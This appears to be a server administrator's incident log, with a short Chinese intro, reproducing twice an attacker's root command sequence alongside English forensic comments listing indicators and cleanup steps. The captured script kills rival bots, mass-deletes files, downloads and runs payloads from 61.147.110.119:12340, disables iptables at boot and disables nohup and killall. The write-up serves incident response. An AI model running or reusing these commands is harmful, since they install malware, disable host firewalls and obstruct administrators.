今天检查服务器时，发现 root 账户下被执行了一大堆命令，记录如下：
# --- Captured attacker command sequence (forensic artifact; kept verbatim) ---
# Step 1: set mode 0775 (rwxrwxr-x) on nohup and killall so the rest of the
# sequence can run them. The same sequence ends by setting both to 0644, so a
# host where either binary lacks its execute bit has probably already been
# through this script at least once.
# NOTE(review): 0775 is also group-writable, which is looser than the 0755
# most distributions ship — confirm against the package database.
chmod 0775 /usr/bin/nohup
chmod 0775 /usr/bin/killall
# Step 2: kill processes by name. None of these are standard system daemons;
# presumably they are other bots or earlier payloads competing for the same
# host — TODO confirm against samples. For triage, the list doubles as a set
# of process names to look for in `ps` output, audit logs and EDR telemetry.
# - `.IptabLex` matches the name used by the publicly documented
#   IptabLes/IptabLex Linux DDoS bot family.
# - `lampp` and `mysql.sock` collide with legitimate software names, so a
#   legitimate process with that name would be killed as well.
# - Names starting with a dot (`.Mm2`, `.TSm`, `.IptabLex`) are hidden from a
#   plain `ls`; use `ls -la` when searching for them.
killall lixtest
killall linuxx
killall ssh3
killall ssh4
killall ssh6
killall ssh-32
killall ssh-64
killall ssh-c4
killall java.13.2.8_11
killall drmc
killall tmpof
killall 1471
killall 1417
killall v432
killall v532
killall 29881
killall 10993
killall behsdf
killall helen
killall lampp
killall Umi34Ber
killall mysql.sock
killall x1
killall xxx
killall dos32
killall dos6
killall 007
killall t32
killall lq64
killall t64
killall lq32
killall java.132.8_11
killall 261180
killall sshbin
killall xudp
killall xupd1
killall xudp2
killall xudp3
killall xudp4
killall xudp5
killall .Mm2
killall .TSm
killall java.2.15.22_20
killall linuxssh
killall strutsbin
killall 266189
killall auto.bin
killall 3232
killall 6832
killall Dols3
killall huang
killall KDLinux
killall txma
killall xja
killall xjb
killall .IptabLex
# Step 3: delete the on-disk files that correspond to the names killed
# earlier in the sequence. `-f` suppresses errors, so a path being absent now
# does not show it was never present; check backups, file-integrity baselines
# and audit logs.
#
# Relative paths: these are removed from whatever directory the session was
# in (not shown in this log).
rm -r -f 3232
rm -r -f 6832
rm -r -f Dols3
rm -r -f huang
rm -r -f KDLinux
rm -r -f txma
rm -r -f xja
rm -r -f xjb
# /tmp drop locations. `/tmp/sh4` does not match the `ssh4` process name
# killed earlier, so a file at /tmp/ssh4 would survive this pass.
# `/tmp/mysql.sock` is the socket path of MySQL installs configured to use it;
# on such hosts local database clients break until mysqld is restarted.
rm -f -r /tmp/lixtest
rm -f -r /tmp/linuxx
rm -f -r /tmp/ssh3
rm -f -r /tmp/sh4
rm -f -r /tmp/ssh6
rm -f -r /tmp/ssh-32
rm -f -r /tmp/ssh-64
rm -f -r /tmp/ssh-c4
rm -f -r /tmp/drmc
rm -f -r /tmp/tmpof
rm -f -r /tmp/1471
rm -f -r /tmp/1417
rm -f -r /tmp/v432
rm -f -r /tmp/v532
rm -f -r /tmp/29881
rm -f -r /tmp/10993
rm -f -r /tmp/behsdf
rm -f -r /tmp/helen
rm -f -r /tmp/lampp
rm -f -r /tmp/Umi34Ber
rm -f -r /tmp/mysql.sock
rm -f -r /tmp/266189
# /etc drop locations. Executables written straight into /etc are themselves
# an indicator. `/etc/dos64` differs from the `dos6` name killed earlier.
rm -f -r /etc/x1
rm -f -r /etc/xxx
rm -f -r /etc/dos32
rm -f -r /etc/dos64
rm -f -r /etc/007
rm -f -r /etc/t32
rm -f -r /etc/lq64
rm -f -r /etc/t64
rm -f -r /etc/lq32
rm -f -r /etc/java.132.8_11
rm -f -r /etc/261180
rm -f -r /tmp/sshbin
rm -f -r /tmp/xudp
rm -f -r /tmp/xupd1
rm -f -r /tmp/xudp2
rm -f -r /tmp/xudp3
rm -f -r /tmp/xudp4
rm -f -r /tmp/xudp5
rm -f -r /tmp/java.2.15.22_20
rm -f -r /tmp/linuxssh
rm -f -r /tmp/strutsbin
rm -f -r /tmp/266189
# No leading slash: this resolves relative to the current directory, so
# /etc/java.13.2.8_11 is only removed if the session was in `/`.
rm -f -r etc/java.13.2.8_11
rm -f -r /etc/auto.bin
# Step 4: remove what look like earlier copies of this same payload before
# reinstalling it. The names imitate system components (`netstat`, `idmapd`)
# so they blend in. /etc/idmapd/ is created later in this same sequence by
# `mkdir`, so it is probably not a stock directory — TODO confirm on a clean
# host of the same distribution.
killall netstat.kv3Ads
rm -r -f /tmp/netstat.kv3Ads
# Deletes every file under /etc whose name ends in ".service2"; the log does
# not show what created those files.
find /etc/ -name "*.service2" -exec rm {} \;
killall idmapd.so.cp
rm -r -f /etc/idmapd/idmapd.so.cp
killall .idmapd_open
rm -r -f /etc/idmapd/.idmapd_open
# Step 5: fetch and start the payload.
# - Network indicator: plain-HTTP download from 61.147.110.119 port 12340,
#   path /110.119. Search proxy, firewall and NetFlow logs for this host and
#   port, and for other internal machines contacting it.
# - File indicator: hidden executable /etc/idmapd/.idmapd_open, mode 0755.
#   Hash and preserve a copy before removing it.
# - The payload runs detached under nohup with all output discarded, so it
#   survives the end of the login session and leaves no nohup.out.
mkdir /etc/idmapd
wget -O /etc/idmapd/.idmapd_open http://61.147.110.119:12340/110.119
chmod 0755 /etc/idmapd/.idmapd_open
nohup /etc/idmapd/.idmapd_open > /dev/null 2>&1 &
# Appends a line to /etc/rc.local so the iptables service is stopped on every
# boot, i.e. the host firewall stays off after a reboot. Each run appends one
# more copy of the line. During cleanup, remove these lines and review the
# rest of rc.local. The visible commands add no boot entry for the payload
# itself; whether the payload installs one cannot be told from this log.
echo "/etc/init.d/iptables stop">>/etc/rc.local
# Step 6: fallback if /etc/idmapd/.idmapd_open does not exist after the
# download attempt. A second binary is fetched from the same host (path
# /10991), saved under /tmp, made executable and started detached.
# The file name `sess_` + 32 hex characters resembles a PHP session file,
# which makes it easy to overlook in /tmp; an *executable* sess_* file in /tmp
# is worth alerting on.
# NOTE(review): the `if` statement is split after `wget -O` and after `nohup`;
# this looks like line wrapping introduced when the log was pasted rather than
# how it was typed — confirm against the raw history file.
myFile="/etc/idmapd/.idmapd_open"
if [ ! -f "$myFile" ]; then killall sess_7fd28830c68bc43b1e42a43b2e250715; rm -r -f /tmp/sess_7fd28830c68bc43b1e42a43b2e250715; wget -O
/tmp/sess_7fd28830c68bc43b1e42a43b2e250715 http://61.147.110.119:12340/10991; chmod 0755 /tmp/sess_7fd28830c68bc43b1e42a43b2e250715; nohup
/tmp/sess_7fd28830c68bc43b1e42a43b2e250715 > /dev/null 2>&1 & fi
# Step 7: clean up and hinder response.
# `java.pl` is removed from the current directory; presumably it is an
# earlier-stage script belonging to this intrusion — TODO confirm, e.g. from
# web-server or upload logs.
rm -r -f java.pl
# Mode 0644 strips the execute bits, so `nohup` and `killall` stop working for
# every user, including an administrator trying to kill the payload. Check
# with `ls -l /usr/bin/nohup /usr/bin/killall`; restore the packaged mode
# (reinstalling the owning packages also restores known-good binaries).
chmod 0644 /usr/bin/nohup
chmod 0644 /usr/bin/killall
# Ends the shell session.
exit
# --- Second occurrence of the same command sequence in the log ---
# The commands from here to the final `exit` appear to repeat, line for line,
# the sequence that ended at the preceding `exit`. This suggests the sequence
# was run in two separate sessions or by an automated tool that retried.
# Correlate with login records (`last`, auth logs) to date each run.
# Re-enables execution of nohup and killall, which the previous run left at
# mode 0644.
chmod 0775 /usr/bin/nohup
chmod 0775 /usr/bin/killall
# Kill-by-name pass over a fixed list of process names, none of which are
# standard system daemons. Presumably they are rival or older bots — TODO
# confirm. The list is usable as a set of process-name indicators.
# `lampp` and `mysql.sock` overlap with legitimate software names.
killall lixtest
killall linuxx
killall ssh3
killall ssh4
killall ssh6
killall ssh-32
killall ssh-64
killall ssh-c4
killall java.13.2.8_11
killall drmc
killall tmpof
killall 1471
killall 1417
killall v432
killall v532
killall 29881
killall 10993
killall behsdf
killall helen
killall lampp
killall Umi34Ber
killall mysql.sock
killall x1
killall xxx
killall dos32
killall dos6
killall 007
killall t32
killall lq64
killall t64
killall lq32
killall java.132.8_11
killall 261180
killall sshbin
killall xudp
killall xupd1
killall xudp2
killall xudp3
killall xudp4
killall xudp5
killall .Mm2
killall .TSm
killall java.2.15.22_20
killall linuxssh
killall strutsbin
killall 266189
killall auto.bin
killall 3232
killall 6832
killall Dols3
killall huang
killall KDLinux
killall txma
killall xja
killall xjb
killall .IptabLex
# File-removal pass over the current directory, /tmp and /etc. Errors are
# suppressed by `-f`, so this output says nothing about which files actually
# existed. Treat every path here as a location to check on other hosts.
rm -r -f 3232
rm -r -f 6832
rm -r -f Dols3
rm -r -f huang
rm -r -f KDLinux
rm -r -f txma
rm -r -f xja
rm -r -f xjb
rm -f -r /tmp/lixtest
rm -f -r /tmp/linuxx
rm -f -r /tmp/ssh3
rm -f -r /tmp/sh4
rm -f -r /tmp/ssh6
rm -f -r /tmp/ssh-32
rm -f -r /tmp/ssh-64
rm -f -r /tmp/ssh-c4
rm -f -r /tmp/drmc
rm -f -r /tmp/tmpof
rm -f -r /tmp/1471
rm -f -r /tmp/1417
rm -f -r /tmp/v432
rm -f -r /tmp/v532
rm -f -r /tmp/29881
rm -f -r /tmp/10993
rm -f -r /tmp/behsdf
rm -f -r /tmp/helen
rm -f -r /tmp/lampp
rm -f -r /tmp/Umi34Ber
# Also the socket path of MySQL installs configured to use /tmp/mysql.sock.
rm -f -r /tmp/mysql.sock
rm -f -r /tmp/266189
rm -f -r /etc/x1
rm -f -r /etc/xxx
rm -f -r /etc/dos32
rm -f -r /etc/dos64
rm -f -r /etc/007
rm -f -r /etc/t32
rm -f -r /etc/lq64
rm -f -r /etc/t64
rm -f -r /etc/lq32
rm -f -r /etc/java.132.8_11
rm -f -r /etc/261180
rm -f -r /tmp/sshbin
rm -f -r /tmp/xudp
rm -f -r /tmp/xupd1
rm -f -r /tmp/xudp2
rm -f -r /tmp/xudp3
rm -f -r /tmp/xudp4
rm -f -r /tmp/xudp5
rm -f -r /tmp/java.2.15.22_20
rm -f -r /tmp/linuxssh
rm -f -r /tmp/strutsbin
rm -f -r /tmp/266189
# Relative path (no leading slash): only hits /etc when run from `/`.
rm -f -r etc/java.13.2.8_11
rm -f -r /etc/auto.bin
# Stops and deletes what look like existing copies of the payload
# (system-sounding names under /tmp and /etc/idmapd), plus any
# "*.service2" file under /etc, before the payload is downloaded again.
killall netstat.kv3Ads
rm -r -f /tmp/netstat.kv3Ads
find /etc/ -name "*.service2" -exec rm {} \;
killall idmapd.so.cp
rm -r -f /etc/idmapd/idmapd.so.cp
killall .idmapd_open
rm -r -f /etc/idmapd/.idmapd_open
# Payload install: plain-HTTP download from 61.147.110.119:12340 into the
# hidden file /etc/idmapd/.idmapd_open, which is made executable and started
# detached with output discarded. Both the address/port and the file path are
# indicators to search for fleet-wide.
mkdir /etc/idmapd
wget -O /etc/idmapd/.idmapd_open http://61.147.110.119:12340/110.119
chmod 0755 /etc/idmapd/.idmapd_open
nohup /etc/idmapd/.idmapd_open > /dev/null 2>&1 &
# Appends another "stop iptables" line to /etc/rc.local, so the host firewall
# is stopped on each boot. Remove these lines during recovery.
echo "/etc/init.d/iptables stop">>/etc/rc.local
# Fallback when /etc/idmapd/.idmapd_open is missing: fetch a second binary
# (path /10991 on the same host) into /tmp under a name that resembles a PHP
# session file, make it executable and start it detached.
# NOTE(review): the breaks after `wget -O` and `nohup` look like paste
# wrapping, not the original command layout — confirm against the raw log.
myFile="/etc/idmapd/.idmapd_open"
if [ ! -f "$myFile" ]; then killall sess_7fd28830c68bc43b1e42a43b2e250715; rm -r -f /tmp/sess_7fd28830c68bc43b1e42a43b2e250715; wget -O
/tmp/sess_7fd28830c68bc43b1e42a43b2e250715 http://61.147.110.119:12340/10991; chmod 0755 /tmp/sess_7fd28830c68bc43b1e42a43b2e250715; nohup
/tmp/sess_7fd28830c68bc43b1e42a43b2e250715 > /dev/null 2>&1 & fi
# Cleanup: removes `java.pl` from the current directory (presumably an
# earlier-stage script — TODO confirm), then strips the execute bits from
# nohup and killall (mode 0644) so neither can be run afterwards, and ends
# the session. Mode 0644 on either binary is a quick host-level check for
# this intrusion.
rm -r -f java.pl
chmod 0644 /usr/bin/nohup
chmod 0644 /usr/bin/killall
exit